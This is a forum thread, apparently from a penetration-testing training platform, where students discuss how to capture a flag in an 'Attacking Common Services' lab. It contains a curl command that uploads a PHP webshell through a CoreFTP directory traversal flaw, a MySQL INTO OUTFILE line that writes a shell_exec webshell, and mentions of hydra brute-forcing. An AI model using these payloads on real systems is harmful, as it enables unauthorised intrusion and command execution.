Attacking Common Services - Easy

( You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer. )

ANYONE KNOW ABOUT THAT TOPIC? I uploaded webshell on site but only working two commands dir and whoami . Have anyone any references ?

1 Like

have you tried the command more?

thanks for response . I have already find answer :slight_smile:

This one was quite a mess. You see so many opportunities that your head spinning in every directions. After some time, i decided for myself to use the CoreFTP HTTP server directory traversal vulnerability. Then I started trying to upload wwwolf-php-webshell with curl (overkill):

curl -k -X PUT -H "Host: <IP>" --basic -u <user>:<password> -F 'fileX=@/path/to/wwwolf-php-webshell/webshell.php' 'https://IP/../../../../../..\xampp\htdocs\myshell.php'

After that its a breeze. just dir "\flag.txt" on drive root with webshell UI

enjoy

2 Likes

Would you be able to message me with more details of how you did this? how did you get a webshell to the \xampp\htdocs?

1 Like

I got the flag with some help from a friend. There are at least two ways to get the flag. One way, the way that I had help with from a friend, does not require a webshell or a php-reverse-shell.

Message me if you need help.

The post that @subrealz made is pretty much on the right track, but I could not figure it out from that post. Honestly, I probably would have never figured out the solution without some help.

John

1 Like

I managed to get the flag with a webshell that I uploaded via sql… It was limited and messy but it did the job.

1 Like

I figured MySQL was the other path.

Sent you a PM… I can most likely do the webshell, but looking for another method that is more in line with the modules in this course… a service. Thanks for any help. Stuck on this one.

1 Like

Got it, thanks @19delta4u !

1 Like

Hello! I`m stuck trying to find the password… I bruteforce but no luck… rockyou list will never complete in the time I have the pawnbox…

I`m going through this manual but I can’t get it working… I must be typing something wrong…

Hi!
I’m stuck on how to obtain the first credentials.
I have done the following:

  1. Enumerate FTP with anonymous, doesn’t accept.
  2. Enumerate SMTP users with mode RCPT, and find one f****.
  3. Tried to brute force this user on SMTP and FTP using hydra and a bunch of different password lists, including the pws.list from module resources, including rockyou.txt over all time of target server is alive.
  4. The MySQL doesn’t also accept undefined user or anonymous concept for login.
  5. I’ve not explore the port 80 for the HTML content, because it gets out of the scope of this module, even more for an easy lab.

I’ve been days on this, can someone help me? Thank you.

1 Like

Try FTP. Brutforce the found user with rockyou. This should be very fast.

Can someone give me some advice, I have entered mysql with the credentials f*** and the pass 9***, but within it I understand that I must upload a file, or how can I do it, I need some advice I am stuck.

Hi. I am found the credentials and was able to insert a PHP shell using MySQL: SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php';
I am trying to access the file in the browser using the parameter https://10.129.196.82/webshell.php?c=dir, but nothing happens. Could someone help me?

Never mind, I figured it out.